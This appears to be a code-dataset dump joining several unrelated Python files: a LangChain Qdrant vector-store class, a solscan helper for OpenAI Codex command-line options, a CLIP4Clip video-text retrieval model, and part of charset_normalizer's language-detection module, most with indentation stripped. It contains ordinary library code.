results = self.similarity_search_with_score(query, k)
return list(map(itemgetter(0), results))
def similarity_search_with_score(
self, query: str, k: int = 4
) -> List[Tuple[Document, float]]:
"""Return docs most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
Returns:
List of Documents most similar to the query and score for each
"""
embedding = self.embedding_function(query)
results = self.client.search(
collection_name=self.collection_name,
query_vector=embedding,
with_payload=True,
limit=k,
)
return [
(
self._document_from_scored_point(
result, self.content_payload_key, self.metadata_payload_key
),
result.score,
)
for result in results
]
def max_marginal_relevance_search(
self, query: str, k: int = 4, fetch_k: int = 20
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
Returns:
List of Documents selected by maximal marginal relevance.
"""
embedding = self.embedding_function(query)
results = self.client.search(
collection_name=self.collection_name,
query_vector=embedding,
with_payload=True,
with_vectors=True,
            limit=fetch_k,  # fetch a larger candidate pool; MMR then selects the top k below
)
embeddings = [result.vector for result in results]
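        # Re-rank the fetched candidates with Maximal Marginal Relevance, trading off similarity
        # to the query against diversity among the selected documents.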
mmr_selected = maximal_marginal_relevance(embedding, embeddings, k=k)
return [
self._document_from_scored_point(
results[i], self.content_payload_key, self.metadata_payload_key
)
for i in mmr_selected
]
@classmethod
def from_documents(
cls,
documents: List[Document],
embedding: Embeddings,
url: Optional[str] = None,
port: Optional[int] = 6333,
grpc_port: int = 6334,
prefer_grpc: bool = False,
https: Optional[bool] = None,
api_key: Optional[str] = None,
prefix: Optional[str] = None,
timeout: Optional[float] = None,
host: Optional[str] = None,
collection_name: Optional[str] = None,
distance_func: str = "Cosine",
content_payload_key: str = CONTENT_KEY,
metadata_payload_key: str = METADATA_KEY,
**kwargs: Any,
) -> "Qdrant":
return cast(
Qdrant,
super().from_documents(
documents,
embedding,
url=url,
port=port,
grpc_port=grpc_port,
prefer_grpc=prefer_grpc,
https=https,
api_key=api_key,
prefix=prefix,
timeout=timeout,
host=host,
collection_name=collection_name,
distance_func=distance_func,
content_payload_key=content_payload_key,
metadata_payload_key=metadata_payload_key,
**kwargs,
),
)
@classmethod
def from_texts(
cls,
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
url: Optional[str] = None,
port: Optional[int] = 6333,
grpc_port: int = 6334,
prefer_grpc: bool = False,
https: Optional[bool] = None,
api_key: Optional[str] = None,
prefix: Optional[str] = None,
timeout: Optional[float] = None,
host: Optional[str] = None,
collection_name: Optional[str] = None,
distance_func: str = "Cosine",
content_payload_key: str = CONTENT_KEY,
metadata_payload_key: str = METADATA_KEY,
**kwargs: Any,
) -> "Qdrant":
"""Construct Qdrant wrapper from raw documents.
Args:
texts: A list of texts to be indexed in Qdrant.
embedding: A subclass of `Embeddings`, responsible for text vectorization.
metadatas:
An optional list of metadata. If provided it has to be of the same
length as a list of texts.
url: either host or str of "Optional[scheme], host, Optional[port],
Optional[prefix]". Default: `None`
port: Port of the REST API interface. Default: 6333
grpc_port: Port of the gRPC interface. Default: 6334
prefer_grpc:
            If `true` - use gRPC interface whenever possible in custom methods.
https: If `true` - use HTTPS(SSL) protocol. Default: `None`
api_key: API key for authentication in Qdrant Cloud. Default: `None`
prefix:
If not `None` - add `prefix` to the REST URL path.
Example: `service/v1` will result in
`http://localhost:6333/service/v1/{qdrant-endpoint}` for REST API.
Default: `None`
timeout:
Timeout for REST and gRPC API requests.
Default: 5.0 seconds for REST and unlimited for gRPC
host:
Host name of Qdrant service. If url and host are None, set to
'localhost'. Default: `None`
collection_name:
Name of the Qdrant collection to be used. If not provided,
will be created randomly.
distance_func:
Distance function. One of the: "Cosine" / "Euclid" / "Dot".
content_payload_key:
A payload key used to store the content of the document.
metadata_payload_key:
A payload key used to store the metadata of the document.
**kwargs:
Additional arguments passed directly into REST client initialization
This is a user friendly interface that:
1. Embeds documents.
2. Creates an in memory docstore
3. Initializes the Qdrant database
This is intended to be a quick way to get started.
Example:
.. code-block:: python
from langchain import Qdrant
from langchain.embeddings import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
qdrant = Qdrant.from_texts(texts, embeddings, "localhost")
"""
try:
import qdrant_client
except ImportError:
raise ValueError(
"Could not import qdrant-client python package. "
"Please install it with `pip install qdrant-client`."
)
from qdrant_client.http import models as rest
# Just do a single quick embedding to get vector size
partial_embeddings = embedding.embed_documents(texts[:1])
vector_size = len(partial_embeddings[0])
collection_name = collection_name or uuid.uuid4().hex
distance_func = distance_func.upper()
client = qdrant_client.QdrantClient(
url=url,
port=port,
grpc_port=grpc_port,
prefer_grpc=prefer_grpc,
https=https,
api_key=api_key,
prefix=prefix,
timeout=timeout,
host=host,
**kwargs,
)
client.recreate_collection(
collection_name=collection_name,
vectors_config=rest.VectorParams(
size=vector_size,
distance=rest.Distance[distance_func],
),
)
# Now generate the embeddings for all the texts
embeddings = embedding.embed_documents(texts)
client.upsert(
collection_name=collection_name,
points=rest.Batch(
ids=[uuid.uuid4().hex for _ in texts],
vectors=embeddings,
payloads=cls._build_payloads(
texts, metadatas, content_payload_key, metadata_payload_key
),
),
)
return cls(
client=client,
collection_name=collection_name,
embedding_function=embedding.embed_query,
content_payload_key=content_payload_key,
metadata_payload_key=metadata_payload_key,
)
@classmethod
def _build_payloads(
cls,
texts: Iterable[str],
metadatas: Optional[List[dict]],
content_payload_key: str,
metadata_payload_key: str,
) -> List[dict]:
payloads = []
for i, text in enumerate(texts):
if text is None:
raise ValueError(
"At least one of the texts is None. Please remove it before "
"calling .from_texts or .add_texts on Qdrant instance."
)
metadata = metadatas[i] if metadatas is not None else None
payloads.append(
{
content_payload_key: text,
metadata_payload_key: metadata,
}
)
return payloads
@classmethod
def _document_from_scored_point(
cls,
scored_point: Any,
content_payload_key: str,
metadata_payload_key: str,
) -> Document:
return Document(
page_content=scored_point.payload.get(content_payload_key),
metadata=scored_point.payload.get(metadata_payload_key) or {},
)
| [] |
2024-01-10 | khulnasoft-lab/solscan | solscan~utils~codex.py | import logging
import os
from argparse import ArgumentParser
from pathlib import Path
from solscan.utils.command_line import defaults_flag_in_config
logger = logging.getLogger("Solscan")
def init_parser(parser: ArgumentParser, always_enable_codex: bool = False) -> None:
"""
Init the cli arg with codex features
Args:
parser:
        always_enable_codex (Optional[bool]): if true, the --codex flag is not added because codex is always enabled
Returns:
"""
group_codex = parser.add_argument_group("Codex (https://beta.openai.com/docs/guides/code)")
if not always_enable_codex:
group_codex.add_argument(
"--codex",
help="Enable codex (require an OpenAI API Key)",
action="store_true",
default=defaults_flag_in_config["codex"],
)
group_codex.add_argument(
"--codex-log",
help="Log codex queries (in crytic_export/codex/)",
action="store_true",
default=False,
)
group_codex.add_argument(
"--codex-contracts",
help="Comma separated list of contracts to submit to OpenAI Codex",
action="store",
default=defaults_flag_in_config["codex_contracts"],
)
group_codex.add_argument(
"--codex-model",
help="Name of the Codex model to use (affects pricing). Defaults to 'text-davinci-003'",
action="store",
default=defaults_flag_in_config["codex_model"],
)
group_codex.add_argument(
"--codex-temperature",
help="Temperature to use with Codex. Lower number indicates a more precise answer while higher numbers return more creative answers. Defaults to 0",
action="store",
default=defaults_flag_in_config["codex_temperature"],
)
group_codex.add_argument(
"--codex-max-tokens",
help="Maximum amount of tokens to use on the response. This number plus the size of the prompt can be no larger than the limit (4097 for text-davinci-003)",
action="store",
default=defaults_flag_in_config["codex_max_tokens"],
)
group_codex.add_argument(
"--codex-organization",
help="Codex organization",
action="store",
default=None,
)
# TODO: investigate how to set the correct return type
# So that the other modules can work with openai
def openai_module(): # type: ignore
"""
Return the openai module
    Consider checking that codex is enabled (solscan.codex_enabled) before using this function
Returns:
Optional[the openai module]
"""
try:
# pylint: disable=import-outside-toplevel
import openai
api_key = os.getenv("OPENAI_API_KEY")
if api_key is None:
logger.info(
"Please provide an Open API Key in OPENAI_API_KEY (https://beta.openai.com/account/api-keys)"
)
return None
openai.api_key = api_key
except ImportError:
logger.info("OpenAI was not installed") # type: ignore
logger.info('run "pip install openai"')
return None
return openai
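# Usage sketch (assuming the legacy openai-python Completion API that this module targets):
#     openai = openai_module()
#     if openai:
#         openai.Completion.create(model="text-davinci-003", prompt="...", max_tokens=64)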
def log_codex(filename: str, prompt: str) -> None:
"""
    Log the prompt in crytic_export/codex/filename
Append to the file
Args:
filename: filename to write to
prompt: prompt to write
Returns:
None
"""
Path("crytic_export/codex").mkdir(parents=True, exist_ok=True)
with open(Path("crytic_export/codex", filename), "a", encoding="utf8") as file:
file.write(prompt)
file.write("\n")
| [] |
2024-01-10 | OpenGVLab/InternVideo | Downstream~Video-Text-Retrieval~modules~modeling_raw.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import torch
from torch import nn
import torch.nn.functional as F
from modules.until_module import PreTrainedModel, AllGather, CrossEn
from modules.module_cross import CrossModel, CrossConfig, Transformer as TransformerClip
from modules.module_clip import CLIP, convert_weights
from modules import clip_evl
from modules import clip_kc
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence
from ipdb import set_trace
logger = logging.getLogger(__name__)
allgather = AllGather.apply
class CLIP4ClipPreTrainedModel(PreTrainedModel, nn.Module):
""" An abstract class to handle weights initialization and
    a simple interface for downloading and loading pretrained models.
"""
def __init__(self, cross_config, *inputs, **kwargs):
super(CLIP4ClipPreTrainedModel, self).__init__(cross_config)
self.cross_config = cross_config
self.clip = None
self.cross = None
@classmethod
def from_pretrained(cls, cross_model_name, state_dict=None, cache_dir=None, type_vocab_size=2, *inputs, **kwargs):
task_config = None
if "task_config" in kwargs.keys():
task_config = kwargs["task_config"]
if not hasattr(task_config, "local_rank"):
task_config.__dict__["local_rank"] = 0
elif task_config.local_rank == -1:
task_config.local_rank = 0
if state_dict is None: state_dict = {}
pretrained_clip_name = "ViT-B/32"
if hasattr(task_config, 'pretrained_clip_name'):
pretrained_clip_name = task_config.pretrained_clip_name
clip_state_dict = CLIP.get_config(pretrained_clip_name=pretrained_clip_name)
for key, val in clip_state_dict.items():
new_key = "clip." + key
if new_key not in state_dict:
state_dict[new_key] = val.clone()
cross_config, _ = CrossConfig.get_config(cross_model_name, cache_dir, type_vocab_size, state_dict=None, task_config=task_config)
model = cls(cross_config, clip_state_dict, *inputs, **kwargs)
## ===> Initialization trick [HARD CODE]
if model.linear_patch == "3d":
contain_conv2 = False
for key in state_dict.keys():
if key.find("visual.conv2.weight") > -1:
contain_conv2 = True
break
if contain_conv2 is False and hasattr(model.clip.visual, "conv2"):
cp_weight = state_dict["clip.visual.conv1.weight"].clone()
kernel_size = model.clip.visual.conv2.weight.size(2)
conv2_size = model.clip.visual.conv2.weight.size()
conv2_size = list(conv2_size)
left_conv2_size = conv2_size.copy()
right_conv2_size = conv2_size.copy()
left_conv2_size[2] = (kernel_size - 1) // 2
right_conv2_size[2] = kernel_size - 1 - left_conv2_size[2]
left_zeros, right_zeros = None, None
if left_conv2_size[2] > 0:
left_zeros = torch.zeros(*tuple(left_conv2_size), dtype=cp_weight.dtype, device=cp_weight.device)
if right_conv2_size[2] > 0:
right_zeros = torch.zeros(*tuple(right_conv2_size), dtype=cp_weight.dtype, device=cp_weight.device)
cat_list = []
if left_zeros != None: cat_list.append(left_zeros)
cat_list.append(cp_weight.unsqueeze(2))
if right_zeros != None: cat_list.append(right_zeros)
cp_weight = torch.cat(cat_list, dim=2)
state_dict["clip.visual.conv2.weight"] = cp_weight
if model.sim_header == 'tightTransf':
contain_cross = False
for key in state_dict.keys():
if key.find("cross.transformer") > -1:
contain_cross = True
break
if contain_cross is False:
for key, val in clip_state_dict.items():
if key == "positional_embedding":
state_dict["cross.embeddings.position_embeddings.weight"] = val.clone()
continue
if key.find("transformer.resblocks") == 0:
num_layer = int(key.split(".")[2])
# cut from beginning
if num_layer < task_config.cross_num_hidden_layers:
state_dict["cross."+key] = val.clone()
continue
if model.sim_header == "seqLSTM" or model.sim_header == "seqTransf":
contain_frame_position = False
for key in state_dict.keys():
if key.find("frame_position_embeddings") > -1:
contain_frame_position = True
break
if contain_frame_position is False:
for key, val in clip_state_dict.items():
if key == "positional_embedding":
state_dict["frame_position_embeddings.weight"] = val.clone()
continue
if model.sim_header == "seqTransf" and key.find("transformer.resblocks") == 0:
num_layer = int(key.split(".")[2])
# cut from beginning
if num_layer < task_config.cross_num_hidden_layers:
state_dict[key.replace("transformer.", "transformerClip.")] = val.clone()
continue
## <=== End of initialization trick
if state_dict is not None:
model = cls.init_preweight(model, state_dict, task_config=task_config)
return model
def show_log(task_config, info):
if task_config is None or task_config.local_rank == 0:
logger.warning(info)
def update_attr(target_name, target_config, target_attr_name, source_config, source_attr_name, default_value=None):
if hasattr(source_config, source_attr_name):
if default_value is None or getattr(source_config, source_attr_name) != default_value:
setattr(target_config, target_attr_name, getattr(source_config, source_attr_name))
show_log(source_config, "Set {}.{}: {}.".format(target_name,
target_attr_name, getattr(target_config, target_attr_name)))
return target_config
def check_attr(target_name, task_config):
return hasattr(task_config, target_name) and task_config.__dict__[target_name]
class CLIP4Clip(CLIP4ClipPreTrainedModel):
def __init__(self, cross_config, clip_state_dict, task_config):
super(CLIP4Clip, self).__init__(cross_config)
self.task_config = task_config
self.ignore_video_index = -1
assert self.task_config.max_words + self.task_config.max_frames <= cross_config.max_position_embeddings
self._stage_one = True
self._stage_two = False
show_log(task_config, "Stage-One:{}, Stage-Two:{}".format(self._stage_one, self._stage_two))
self.loose_type = False
if self._stage_one and check_attr('loose_type', self.task_config):
self.loose_type = True
show_log(task_config, "Test retrieval by loose type.")
# CLIP Encoders: From OpenAI: CLIP [https://github.com/openai/CLIP] ===>
vit = "visual.proj" in clip_state_dict
assert vit
if vit:
vision_width = clip_state_dict["visual.conv1.weight"].shape[0]
vision_layers = len(
[k for k in clip_state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = clip_state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((clip_state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in clip_state_dict if k.startswith(f"visual.layer{b}"))) for b in
[1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = clip_state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((clip_state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == clip_state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = clip_state_dict["text_projection"].shape[1]
context_length = clip_state_dict["positional_embedding"].shape[0]
vocab_size = clip_state_dict["token_embedding.weight"].shape[0]
transformer_width = clip_state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in clip_state_dict if k.startswith(f"transformer.resblocks")))
show_log(task_config, "\t embed_dim: {}".format(embed_dim))
show_log(task_config, "\t image_resolution: {}".format(image_resolution))
show_log(task_config, "\t vision_layers: {}".format(vision_layers))
show_log(task_config, "\t vision_width: {}".format(vision_width))
show_log(task_config, "\t vision_patch_size: {}".format(vision_patch_size))
show_log(task_config, "\t context_length: {}".format(context_length))
show_log(task_config, "\t vocab_size: {}".format(vocab_size))
show_log(task_config, "\t transformer_width: {}".format(transformer_width))
show_log(task_config, "\t transformer_heads: {}".format(transformer_heads))
show_log(task_config, "\t transformer_layers: {}".format(transformer_layers))
self.linear_patch = '2d'
if hasattr(task_config, "linear_patch"):
self.linear_patch = task_config.linear_patch
show_log(task_config, "\t\t linear_patch: {}".format(self.linear_patch))
# use .float() to avoid overflow/underflow from fp16 weight. https://github.com/openai/CLIP/issues/40
cut_top_layer = 0
show_log(task_config, "\t cut_top_layer: {}".format(cut_top_layer))
self.clip = CLIP(
embed_dim,
image_resolution, vision_layers-cut_top_layer, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers-cut_top_layer,
linear_patch=self.linear_patch
).float()
for key in ["input_resolution", "context_length", "vocab_size"]:
if key in clip_state_dict:
del clip_state_dict[key]
convert_weights(self.clip)
# <=== End of CLIP Encoders
self.sim_header = 'meanP'
if hasattr(task_config, "sim_header"):
self.sim_header = task_config.sim_header
show_log(task_config, "\t sim_header: {}".format(self.sim_header))
if self.sim_header == "tightTransf": assert self.loose_type is False
cross_config.max_position_embeddings = context_length
if self.loose_type is False:
# Cross Encoder ===>
cross_config = update_attr("cross_config", cross_config, "num_hidden_layers", self.task_config, "cross_num_hidden_layers")
self.cross = CrossModel(cross_config)
# <=== End of Cross Encoder
self.similarity_dense = nn.Linear(cross_config.hidden_size, 1)
if self.sim_header == "seqLSTM" or self.sim_header == "seqTransf":
self.frame_position_embeddings = nn.Embedding(cross_config.max_position_embeddings, cross_config.hidden_size)
if self.sim_header == "seqTransf":
self.transformerClip = TransformerClip(width=transformer_width, layers=self.task_config.cross_num_hidden_layers,
heads=transformer_heads, )
if self.sim_header == "seqLSTM":
self.lstm_visual = nn.LSTM(input_size=cross_config.hidden_size, hidden_size=cross_config.hidden_size,
batch_first=True, bidirectional=False, num_layers=1)
self.loss_fct = CrossEn()
self.apply(self.init_weights)
def forward(self, input_ids, token_type_ids, attention_mask, video, video_mask=None):
input_ids = input_ids.view(-1, input_ids.shape[-1])
token_type_ids = token_type_ids.view(-1, token_type_ids.shape[-1])
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
video_mask = video_mask.view(-1, video_mask.shape[-1])
# T x 3 x H x W
video = torch.as_tensor(video).float()
b, pair, bs, ts, channel, h, w = video.shape
video = video.view(b * pair * bs * ts, channel, h, w)
video_frame = bs * ts
sequence_output, visual_output = self.get_sequence_visual_output(input_ids, token_type_ids, attention_mask,
video, video_mask, shaped=True, video_frame=video_frame)
if self.training:
loss = 0.
sim_matrix, *_tmp = self.get_similarity_logits(sequence_output, visual_output, attention_mask, video_mask,
shaped=True, loose_type=self.loose_type)
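            # Symmetric contrastive loss: cross-entropy over the similarity matrix in both the
            # text-to-video and video-to-text directions, then averaged.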
sim_loss1 = self.loss_fct(sim_matrix)
sim_loss2 = self.loss_fct(sim_matrix.T)
sim_loss = (sim_loss1 + sim_loss2) / 2
loss += sim_loss
return loss
else:
return None
def get_sequence_output(self, input_ids, token_type_ids, attention_mask, shaped=False):
if shaped is False:
input_ids = input_ids.view(-1, input_ids.shape[-1])
token_type_ids = token_type_ids.view(-1, token_type_ids.shape[-1])
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
bs_pair = input_ids.size(0)
sequence_hidden = self.clip.encode_text(input_ids).float()
sequence_hidden = sequence_hidden.view(bs_pair, -1, sequence_hidden.size(-1))
return sequence_hidden
def get_visual_output(self, video, video_mask, shaped=False, video_frame=-1):
if shaped is False:
video_mask = video_mask.view(-1, video_mask.shape[-1])
video = torch.as_tensor(video).float()
b, pair, bs, ts, channel, h, w = video.shape
video = video.view(b * pair * bs * ts, channel, h, w)
video_frame = bs * ts
bs_pair = video_mask.size(0)
visual_hidden = self.clip.encode_image(video, video_frame=video_frame).float()
visual_hidden = visual_hidden.view(bs_pair, -1, visual_hidden.size(-1))
return visual_hidden
def get_sequence_visual_output(self, input_ids, token_type_ids, attention_mask, video, video_mask, shaped=False, video_frame=-1):
if shaped is False:
input_ids = input_ids.view(-1, input_ids.shape[-1])
token_type_ids = token_type_ids.view(-1, token_type_ids.shape[-1])
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
video_mask = video_mask.view(-1, video_mask.shape[-1])
video = torch.as_tensor(video).float()
b, pair, bs, ts, channel, h, w = video.shape
video = video.view(b * pair * bs * ts, channel, h, w)
video_frame = bs * ts
sequence_output = self.get_sequence_output(input_ids, token_type_ids, attention_mask, shaped=True)
visual_output = self.get_visual_output(video, video_mask, shaped=True, video_frame=video_frame)
return sequence_output, visual_output
def _get_cross_output(self, sequence_output, visual_output, attention_mask, video_mask):
        concat_features = torch.cat((sequence_output, visual_output), dim=1)  # concatenate tokens and frames
concat_mask = torch.cat((attention_mask, video_mask), dim=1)
text_type_ = torch.zeros_like(attention_mask)
video_type_ = torch.ones_like(video_mask)
concat_type = torch.cat((text_type_, video_type_), dim=1)
cross_layers, pooled_output = self.cross(concat_features, concat_type, concat_mask, output_all_encoded_layers=True)
cross_output = cross_layers[-1]
return cross_output, pooled_output, concat_mask
def _mean_pooling_for_similarity_sequence(self, sequence_output, attention_mask):
attention_mask_un = attention_mask.to(dtype=torch.float).unsqueeze(-1)
attention_mask_un[:, 0, :] = 0.
sequence_output = sequence_output * attention_mask_un
text_out = torch.sum(sequence_output, dim=1) / torch.sum(attention_mask_un, dim=1, dtype=torch.float)
return text_out
def _mean_pooling_for_similarity_visual(self, visual_output, video_mask,):
video_mask_un = video_mask.to(dtype=torch.float).unsqueeze(-1)
visual_output = visual_output * video_mask_un
video_mask_un_sum = torch.sum(video_mask_un, dim=1, dtype=torch.float)
video_mask_un_sum[video_mask_un_sum == 0.] = 1.
video_out = torch.sum(visual_output, dim=1) / video_mask_un_sum
return video_out
def _mean_pooling_for_similarity(self, sequence_output, visual_output, attention_mask, video_mask,):
text_out = self._mean_pooling_for_similarity_sequence(sequence_output, attention_mask)
video_out = self._mean_pooling_for_similarity_visual(visual_output, video_mask)
return text_out, video_out
def _loose_similarity(self, sequence_output, visual_output, attention_mask, video_mask, sim_header="meanP"):
sequence_output, visual_output = sequence_output.contiguous(), visual_output.contiguous()
if sim_header == "meanP":
# Default: Parameter-free type
pass
elif sim_header == "seqLSTM":
# Sequential type: LSTM
visual_output_original = visual_output
visual_output = pack_padded_sequence(visual_output, torch.sum(video_mask, dim=-1).cpu(),
batch_first=True, enforce_sorted=False)
visual_output, _ = self.lstm_visual(visual_output)
if self.training: self.lstm_visual.flatten_parameters()
visual_output, _ = pad_packed_sequence(visual_output, batch_first=True)
visual_output = torch.cat((visual_output, visual_output_original[:, visual_output.size(1):, ...].contiguous()), dim=1)
visual_output = visual_output + visual_output_original
elif sim_header == "seqTransf":
# Sequential type: Transformer Encoder
visual_output_original = visual_output
seq_length = visual_output.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=visual_output.device)
position_ids = position_ids.unsqueeze(0).expand(visual_output.size(0), -1)
frame_position_embeddings = self.frame_position_embeddings(position_ids)
visual_output = visual_output + frame_position_embeddings
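            # Build an additive attention mask: padded frames receive a large negative bias so the
            # transformer's softmax effectively ignores them.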
extended_video_mask = (1.0 - video_mask.unsqueeze(1)) * -1000000.0
extended_video_mask = extended_video_mask.expand(-1, video_mask.size(1), -1)
visual_output = visual_output.permute(1, 0, 2) # NLD -> LND
visual_output = self.transformerClip(visual_output, extended_video_mask)
visual_output = visual_output.permute(1, 0, 2) # LND -> NLD
visual_output = visual_output + visual_output_original
if self.training:
visual_output = allgather(visual_output, self.task_config)
video_mask = allgather(video_mask, self.task_config)
sequence_output = allgather(sequence_output, self.task_config)
torch.distributed.barrier()
visual_output = visual_output / visual_output.norm(dim=-1, keepdim=True)
visual_output = self._mean_pooling_for_similarity_visual(visual_output, video_mask)
visual_output = visual_output / visual_output.norm(dim=-1, keepdim=True)
sequence_output = sequence_output.squeeze(1)
sequence_output = sequence_output / sequence_output.norm(dim=-1, keepdim=True)
logit_scale = self.clip.logit_scale.exp()
retrieve_logits = logit_scale * torch.matmul(sequence_output, visual_output.t())
return retrieve_logits
def _cross_similarity(self, sequence_output, visual_output, attention_mask, video_mask):
sequence_output, visual_output = sequence_output.contiguous(), visual_output.contiguous()
b_text, s_text, h_text = sequence_output.size()
b_visual, s_visual, h_visual = visual_output.size()
retrieve_logits_list = []
step_size = b_text # set smaller to reduce memory cost
split_size = [step_size] * (b_text // step_size)
release_size = b_text - sum(split_size)
if release_size > 0:
split_size += [release_size]
        # the CLIP text branch returns only the last hidden state, so rebuild a single-token attention mask
attention_mask = torch.ones(sequence_output.size(0), 1)\
.to(device=attention_mask.device, dtype=attention_mask.dtype)
sequence_output_splits = torch.split(sequence_output, split_size, dim=0)
attention_mask_splits = torch.split(attention_mask, split_size, dim=0)
for i in range(len(split_size)):
sequence_output_row = sequence_output_splits[i]
attention_mask_row = attention_mask_splits[i]
sequence_output_l = sequence_output_row.unsqueeze(1).repeat(1, b_visual, 1, 1)
sequence_output_l = sequence_output_l.view(-1, s_text, h_text)
attention_mask_l = attention_mask_row.unsqueeze(1).repeat(1, b_visual, 1)
attention_mask_l = attention_mask_l.view(-1, s_text)
step_truth = sequence_output_row.size(0)
visual_output_r = visual_output.unsqueeze(0).repeat(step_truth, 1, 1, 1)
visual_output_r = visual_output_r.view(-1, s_visual, h_visual)
video_mask_r = video_mask.unsqueeze(0).repeat(step_truth, 1, 1)
video_mask_r = video_mask_r.view(-1, s_visual)
cross_output, pooled_output, concat_mask = \
self._get_cross_output(sequence_output_l, visual_output_r, attention_mask_l, video_mask_r)
retrieve_logits_row = self.similarity_dense(pooled_output).squeeze(-1).view(step_truth, b_visual)
retrieve_logits_list.append(retrieve_logits_row)
retrieve_logits = torch.cat(retrieve_logits_list, dim=0)
return retrieve_logits
def get_similarity_logits(self, sequence_output, visual_output, attention_mask, video_mask, shaped=False, loose_type=False):
if shaped is False:
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
video_mask = video_mask.view(-1, video_mask.shape[-1])
contrastive_direction = ()
if loose_type:
assert self.sim_header in ["meanP", "seqLSTM", "seqTransf"]
retrieve_logits = self._loose_similarity(sequence_output, visual_output, attention_mask, video_mask, sim_header=self.sim_header)
else:
assert self.sim_header in ["tightTransf"]
retrieve_logits = self._cross_similarity(sequence_output, visual_output, attention_mask, video_mask, )
return retrieve_logits, contrastive_direction | [] |
2024-01-10 | thomas-yanxin/Smart_container | Smart_container~venv~Lib~site-packages~charset_normalizer~cd.py | import importlib
from codecs import IncrementalDecoder
from collections import Counter
from functools import lru_cache
from typing import Dict, List, Optional, Set, Tuple
from .assets import FREQUENCIES
from .md import is_suspiciously_successive_range
from .models import CoherenceMatches
from .utils import is_multi_byte_encoding, is_unicode_range_secondary, unicode_range
def encoding_unicode_range(iana_name: str) -> List[str]:
"""
Return associated unicode ranges in a single byte code page.
"""
if is_multi_byte_encoding(iana_name):
raise IOError("Function not supported on multi-byte code page")
decoder = importlib.import_module("encodings.{}".format(iana_name)).IncrementalDecoder # type: ignore
p = decoder(errors="ignore") # type: IncrementalDecoder
seen_ranges = set() # type: Set[str]
for i in range(48, 255):
chunk = p.decode(bytes([i])) # type: str
if chunk:
character_range = unicode_range(chunk) # type: Optional[str]
if character_range is None:
continue
if is_unicode_range_secondary(character_range) is False:
seen_ranges.add(character_range)
return sorted(list(seen_ranges))
def unicode_range_languages(primary_range: str) -> List[str]:
"""
Return inferred languages used with a unicode range.
"""
languages = [] # type: List[str]
for language, characters in FREQUENCIES.items():
for character in characters:
if unicode_range(character) == primary_range:
languages.append(language)
break
return languages
@lru_cache()
def encoding_languages(iana_name: str) -> List[str]:
"""
    Single-byte encoding language association. Some code pages are heavily linked to particular language(s).
This function does the correspondence.
"""
unicode_ranges = encoding_unicode_range(iana_name) # type: List[str]
primary_range = None # type: Optional[str]
for specified_range in unicode_ranges:
if "Latin" not in specified_range:
primary_range = specified_range
break
if primary_range is None:
return ["Latin Based"]
return unicode_range_languages(primary_range)
def mb_encoding_languages(iana_name: str) -> List[str]:
"""
    Multi-byte encoding language association. Some code pages are heavily linked to particular language(s).
This function does the correspondence.
"""
if (
iana_name.startswith("shift_")
or iana_name.startswith("iso2022_jp")
or iana_name.startswith("euc_j")
or iana_name in {"cp932"}
):
return ["Japanese"]
if iana_name.startswith("gb") or iana_name in {"big5", "cp950", "big5hkscs"}:
return ["Chinese", "Classical Chinese"]
if iana_name.startswith("iso2022_kr") or iana_name in {"johab", "cp949", "euc_kr"}:
return ["Korean"]
return []
def alphabet_languages(characters: List[str]) -> List[str]:
"""
    Return the languages associated with the given characters.
"""
languages = [] # type: List[str]
for language, language_characters in FREQUENCIES.items():
character_match_count = 0 # type: int
character_count = len(language_characters) # type: int
for character in language_characters:
if character in characters:
character_match_count += 1
if character_match_count / character_count >= 0.2:
languages.append(language)
return languages
def characters_popularity_compare(
language: str, ordered_characters: List[str]
) -> float:
"""
    Determine if an ordered character list (by occurrence, from most frequent to rarest) matches a particular language.
    The result is a ratio between 0. (absolutely no correspondence) and 1. (near-perfect fit).
    Beware that this function is not strict on the match, in order to ease detection. (Meaning a close match counts as 1.)
"""
if language not in FREQUENCIES:
raise ValueError("{} not available".format(language))
character_approved_count = 0 # type: int
for character in ordered_characters:
if character not in FREQUENCIES[language]:
continue
characters_before_source = FREQUENCIES[language][
0 : FREQUENCIES[language].index(character)
] # type: List[str]
characters_after_source = FREQUENCIES[language][
FREQUENCIES[language].index(character) :
] # type: List[str]
characters_before = ordered_characters[
0 : ordered_characters.index(character)
] # type: List[str]
characters_after = ordered_characters[
ordered_characters.index(character) :
] # type: List[str]
before_match_count = [
e in characters_before for e in characters_before_source
].count(
True
) # type: int
after_match_count = [
e in characters_after for e in characters_after_source
].count(
True
) # type: int
if len(characters_before_source) == 0 and before_match_count <= 4:
character_approved_count += 1
continue
if len(characters_after_source) == 0 and after_match_count <= 4:
character_approved_count += 1
continue
if (
before_match_count / len(characters_before_source) >= 0.4
or after_match_count / len(characters_after_source) >= 0.4
):
character_approved_count += 1
continue
return character_approved_count / len(ordered_characters)
def alpha_unicode_split(decoded_sequence: str) -> List[str]:
"""
    Given a decoded text sequence, return a list of str split by Unicode range / alphabet.
    Ex. a text containing English/Latin with a bit of Hebrew will return two items in the resulting list;
    one containing the Latin letters and the other the Hebrew ones.
"""
layers = {} # type: Dict[str, str]
